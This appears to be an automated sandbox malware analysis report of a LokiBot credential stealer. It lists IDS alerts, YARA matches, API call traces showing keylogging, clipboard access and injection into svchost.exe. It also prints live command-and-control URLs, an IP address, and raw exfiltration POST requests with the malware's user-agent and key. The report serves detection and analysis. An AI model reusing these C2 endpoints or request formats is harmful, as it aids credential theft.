Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56480 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56482 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56480 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56480 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56481 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56483 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56482 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56481 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56483 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56483 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56481 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56483 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56482 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56483 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:56480 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:56481 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56482 -> 94.156.177.41:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 94.156.177.41 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /alpha/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7FD26B34Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /alpha/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7FD26B34Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /alpha/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7FD26B34Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /alpha/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7FD26B34Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00454EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00454EB5

Source: unknown

HTTP traffic detected: POST /alpha/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7FD26B34Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 03 Jan 2025 04:36:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 03 Jan 2025 04:36:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 03 Jan 2025 04:37:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 03 Jan 2025 04:37:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00456B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00456B0C

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00456D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00456D07

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

0_2_00456B0C

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00442B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00442B37

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0046F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F59CB00,6F59C2F0,SetCapture,ClientToScreen,6F59C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0046F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: ZsRFRjkt9q.exe PID: 6336, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403D19
Source: ZsRFRjkt9q.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: ZsRFRjkt9q.exe, 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_620b73ff-5
Source: ZsRFRjkt9q.exe, 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_53471e41-b
Source: ZsRFRjkt9q.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c013e2a3-2
Source: ZsRFRjkt9q.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e3b736dc-7

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00403742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00403742
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004700AF NtdllDialogWndProc_W,	0_2_004700AF
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00470133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	0_2_00470133
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0047044C NtdllDialogWndProc_W,	0_2_0047044C
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046E9AF NtdllDialogWndProc_W,CallWindowProcW,	0_2_0046E9AF
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041AAFC NtdllDialogWndProc_W,	0_2_0041AAFC
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041AB4F NtdllDialogWndProc_W,	0_2_0041AB4F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046EC7C NtdllDialogWndProc_W,	0_2_0046EC7C
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_0046EEEB
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041B11F NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,	0_2_0041B11F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_0046F1D7
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F2D0 SendMessageW,NtdllDialogWndProc_W,	0_2_0046F2D0
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0046F351
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041B385 GetParent,NtdllDialogWndProc_W,	0_2_0041B385
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_0041B55D
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F5DA NtdllDialogWndProc_W,	0_2_0046F5DA
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F5AB NtdllDialogWndProc_W,	0_2_0046F5AB
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F654 NtdllDialogWndProc_W,	0_2_0046F654
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F609 NtdllDialogWndProc_W,	0_2_0046F609
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F689 ClientToScreen,6F59C5D0,NtdllDialogWndProc_W,	0_2_0046F689
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041B715 NtdllDialogWndProc_W,	0_2_0041B715
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F7C3 GetWindowLongW,NtdllDialogWndProc_W,	0_2_0046F7C3
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F59CB00,6F59C2F0,SetCapture,ClientToScreen,6F59C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_0046F7FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00743540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	1_2_00743540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00742720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	1_2_00742720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007433C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	1_2_007433C0

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00446606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00446606

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0043ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746D5590,746D7ED0,CreateProcessAsUserW,746D5030,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,746D7F30,

0_2_0043ACC5

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_004479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004479D3

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042B043	0_2_0042B043
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00413200	0_2_00413200
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0043410F	0_2_0043410F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004202A4	0_2_004202A4
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0040E3E3	0_2_0040E3E3
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0043038E	0_2_0043038E
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0043467F	0_2_0043467F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004206D9	0_2_004206D9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046AACE	0_2_0046AACE
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00434BEF	0_2_00434BEF
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042CCC1	0_2_0042CCC1
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0040AF50	0_2_0040AF50
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00406F07	0_2_00406F07
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041B11F	0_2_0041B11F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004631BC	0_2_004631BC
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042D1B9	0_2_0042D1B9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0043724D	0_2_0043724D
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042123A	0_2_0042123A
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004413CA	0_2_004413CA
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004093F0	0_2_004093F0
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041F563	0_2_0041F563
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004096C0	0_2_004096C0
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044B6CC	0_2_0044B6CC
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046F7FF	0_2_0046F7FF
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004077B0	0_2_004077B0
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004379C9	0_2_004379C9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041FA57	0_2_0041FA57
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00409B60	0_2_00409B60
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00413B70	0_2_00413B70
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00407D19	0_2_00407D19
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041FE6F	0_2_0041FE6F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00429ED0	0_2_00429ED0
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00407FA3	0_2_00407FA3
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_009B6388	0_2_009B6388
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0093489C	0_2_0093489C
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00931DD4	0_2_00931DD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004029D4	1_2_004029D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00742720	1_2_00742720

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: String function: 0042F8A0 appears 35 times
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: String function: 00426AC0 appears 42 times
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: String function: 0041EC2F appears 68 times

Source: ZsRFRjkt9q.exe, 00000000.00000003.1654737364.000000000362D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZsRFRjkt9q.exe
Source: ZsRFRjkt9q.exe, 00000000.00000003.1654968300.0000000003483000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZsRFRjkt9q.exe

Source: ZsRFRjkt9q.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

